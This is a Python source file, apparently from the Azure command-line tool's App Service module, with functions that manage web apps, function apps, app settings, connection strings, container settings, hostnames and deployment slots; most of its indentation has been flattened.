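# between the plain and the '_slot' flavour of the SDK call, e.g. (arguments invented):
#
#     _generic_settings_operation(cli_ctx, 'rg', 'app', 'update_application_settings', props)
#     # -> client.web_apps.update_application_settings('rg', 'app', str, props)
#
#     _generic_settings_operation(cli_ctx, 'rg', 'app', 'update_application_settings', props, slot='staging')
#     # -> client.web_apps.update_application_settings_slot('rg', 'app', 'staging', str, props)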
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
    if not app_instance:  # when the routine is invoked as a helper method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(src_plan_info) or is_plan_elastic_premium(src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(dest_plan_instance) or is_plan_elastic_premium(dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
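# A minimal illustrative sketch (added here, not from the original source): the hypothetical
# helper below documents the expected results of _format_fx_version for a plain image name,
# an already-prefixed value, a multicontainer config type, and a blank value used to clear
# the setting.
def _example_format_fx_version():
    assert _format_fx_version('nginx:latest') == 'DOCKER|nginx:latest'
    assert _format_fx_version('DOCKER|nginx:latest') == 'DOCKER|nginx:latest'  # already prefixed
    assert _format_fx_version('ZW5jb2RlZA==', 'COMPOSE') == 'COMPOSE|ZW5jb2RlZA=='
    assert _format_fx_version('   ') == ' '  # whitespace-only input clears the setting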
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
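# A minimal illustrative sketch (added here, not from the original source): the hypothetical
# helper below documents that url_validator only treats a value as a URL when it carries a
# scheme, a host and a path component; anything else falls through to the local-file branch
# of the caller.
def _example_url_validator():
    assert url_validator('https://example.com/docker-compose.yml') is True
    assert url_validator('docker-compose.yml') is False   # no scheme/netloc -> local file
    assert url_validator('https://example.com') is False  # no path component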
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
    # Base64-encode the file content and return it as a UTF-8 string
return b64encode(config_file_bytes).decode('utf-8')
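# Illustrative note, not part of the original module: the value returned above is what ends up
# after the '|' separator in linux_fx_version. For instance, a compose file whose raw content
# is b'version: "3"' would be stored as
#
#     COMPOSE|dmVyc2lvbjogIjMi
#
# and _get_linux_multicontainer_decoded_config simply reverses the base64 step.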
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None,
linux_fx_version=None, windows_fx_version=None, reserved_instance_count=None, php_version=None, # pylint: disable=unused-argument
python_version=None, net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None, # pylint: disable=unused-argument
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if reserved_instance_count is not None:
reserved_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', reserved_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['reserved_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
    if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
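# A minimal illustrative sketch (added here, not from the original source): the hypothetical
# helper below documents how _build_app_settings_output converts the raw properties dict into
# the list-of-dicts shape used by the CLI output, flagging which names are slot-sticky.
def _example_build_app_settings_output():
    output = _build_app_settings_output({'FOO': 'bar', 'DB': 'conn'}, ['DB'])
    assert {'name': 'FOO', 'value': 'bar', 'slotSetting': False} in output
    assert {'name': 'DB', 'value': 'conn', 'slotSetting': True} in output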
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
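# A minimal illustrative sketch (added here, not from the original source): the hypothetical
# helper below documents that, when handed the dict form of the app settings, the registry
# password is blanked out before being displayed.
def _example_mask_creds_related_appsettings():
    masked = _mask_creds_related_appsettings({'DOCKER_REGISTRY_SERVER_PASSWORD': 'secret',
                                              'DOCKER_REGISTRY_SERVER_URL': 'https://example.azurecr.io'})
    assert masked['DOCKER_REGISTRY_SERVER_PASSWORD'] is None
    assert masked['DOCKER_REGISTRY_SERVER_URL'] == 'https://example.azurecr.io'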
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
